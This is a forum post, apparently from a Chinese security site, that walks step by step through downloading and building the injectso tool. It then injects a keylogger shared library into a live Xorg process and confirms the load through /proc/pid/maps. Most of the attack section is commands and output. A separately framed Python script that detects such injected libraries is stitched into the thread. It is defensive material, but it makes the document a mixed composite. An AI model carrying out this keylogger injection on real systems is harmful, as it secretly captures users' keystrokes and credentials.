injectso
Posted on 2013-1-21 12:53:06

For details, see http://fuzzexp.org/linux_injectso_backdoor.html

For the SO, see http://www.3g-sec.com/thread-1282-1-1.html


Straight to the steps:


[root@localhost LD_PRELOAD_keylogger]# mv keylogger.so /tmp/
[root@localhost LD_PRELOAD_keylogger]# wget http://lucky.fuzzexp.org/file/misc/injectso-0.52.tgz
[root@localhost LD_PRELOAD_keylogger]# tar xf injectso-0.52.tgz 
[root@localhost LD_PRELOAD_keylogger]# cd injectso
[root@localhost injectso]# make
gcc -c -Wall -O2 inject.c
inject.c: In function ‘inject_code’:
inject.c:529: warning: format ‘%lx’ expects type ‘long unsigned int’, but argument 2 has type ‘uint32_t’
inject.c:529: warning: format ‘%lx’ expects type ‘long unsigned int’, but argument 3 has type ‘uint32_t’
inject.c:558: warning: format ‘%lx’ expects type ‘long unsigned int’, but argument 2 has type ‘uint32_t’
inject.c:558: warning: format ‘%lx’ expects type ‘long unsigned int’, but argument 3 has type ‘uint32_t’
gcc inject.o -o inject -ldl
gcc -c -Wall -O2 -fPIC event.c dlwrap.c
gcc -c -Wall -O2 -fPIC dso-test.c
ld -shared -o event.so event.o dlwrap.o -lpthread
ld -shared -o dso-test.so dso-test.o
[root@localhost injectso]# 


Pick any process:


[root@localhost injectso]# ps -ef | grep gdm
root      4039     1  0 17:22 ?        00:00:00 /usr/sbin/gdm-binary -nodaemon
root      4073  4039  0 17:22 ?        00:00:00 /usr/sbin/gdm-binary -nodaemon
root      4075     1  0 17:22 ?        00:00:00 /usr/libexec/gdm-rh-security-token-helper
root      4078  4073  0 17:22 tty7     00:00:09 /usr/bin/Xorg :0 -br -audit 0 -auth /var/gdm/:0.Xauth -nolisten tcp vt7
root     28424 26635  0 20:19 pts/6    00:00:00 grep gdm
[root@localhost injectso]# ./inject -p 4078 -P /tmp/keylogger.so 
injectso v0.52 -- DSO process hotpatching tool

[+] Using /proc/pid/maps method ...
[+] My '__libc_dlopen_mode': 0x2182e0
[+] Foreign libc start: 0x4ef000
[+] => Foreign '__libc_dlopen_mode' address: 0x5f72e0
[+] Using normalized DSO path '/tmp/keylogger.so'
[+] x86 mode
[+] esp=0xbf8f1d6c eip=0x350402
[+] esp=0xbf8f1d70 eip=0x0
[+] done.
[root@localhost injectso]# 


Check:


[root@localhost injectso]# cat /proc/4078/maps | grep tmp
00ba1000-00ba3000 r-xp 00000000 08:02 1310526    /tmp/keylogger.so
00ba3000-00ba4000 rwxp 00001000 08:02 1310526    /tmp/keylogger.so
[root@localhost injectso]# 





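Only after playing a thousand tunes does one understand music; only after examining a thousand swords does one know a fine blade.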
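As an added example (not part of the original post and not injectso's own code): a Python check that parses `/proc/<pid>/maps` and flags executable mappings like the `/tmp/keylogger.so` lines in the output above. The suspect-directory list, the function names and the three extra sample lines are assumptions made for illustration.

```python
import re

# Assumption: directories a legitimate shared object is not normally loaded from.
SUSPECT_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Fields: address range, perms, offset, dev, inode, optional pathname.
MAPS_RE = re.compile(
    r"^([0-9a-f]+)-([0-9a-f]+)\s+([rwxsp-]{4})\s+[0-9a-f]+\s+\S+\s+(\d+)\s*(.*)$")

def parse_maps_line(line):
    """Return a dict for one /proc/<pid>/maps line, or None if it does not parse."""
    m = MAPS_RE.match(line.strip())
    if not m:
        return None
    start, end, perms, inode, path = m.groups()
    return {"start": int(start, 16), "end": int(end, 16),
            "perms": perms, "inode": int(inode), "path": path}

def audit_maps(text):
    """Flag executable mappings that look like an injected DSO."""
    findings = []
    for line in text.splitlines():
        e = parse_maps_line(line)
        if e is None or "x" not in e["perms"]:
            continue
        reasons = []
        if e["path"].startswith(SUSPECT_DIRS):
            reasons.append("executable mapping from a world-writable directory")
        if e["path"].endswith(" (deleted)"):
            reasons.append("backing file was deleted after loading")
        if "w" in e["perms"] and e["inode"] != 0:
            reasons.append("file-backed mapping is writable and executable")
        if reasons:
            findings.append((e["path"], e["perms"], reasons))
    return findings

def audit_pid(pid):
    """Audit a live process (needs permission to read /proc/<pid>/maps)."""
    with open(f"/proc/{pid}/maps") as fh:
        return audit_maps(fh.read())

# First two lines are from the post; the other three are constructed for contrast.
SAMPLE = """\
00ba1000-00ba3000 r-xp 00000000 08:02 1310526    /tmp/keylogger.so
00ba3000-00ba4000 rwxp 00001000 08:02 1310526    /tmp/keylogger.so
004ef000-00642000 r-xp 00000000 08:02 1279021    /lib/libc-2.5.so
08047000-081be000 r-xp 00000000 08:02 1968203    /usr/bin/Xorg
bf8dd000-bf8f2000 rw-p bffe9000 00:00 0          [stack]
"""

if __name__ == "__main__":
    for path, perms, reasons in audit_maps(SAMPLE):
        print(f"{perms} {path}: {'; '.join(reasons)}")
```

On a live host, `audit_pid(pid)` can be run across every numeric entry in `/proc` as root to sweep all processes.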
Posted on 2014-12-6 10:54:25
Notice: the author has been banned or deleted; the content is automatically hidden.
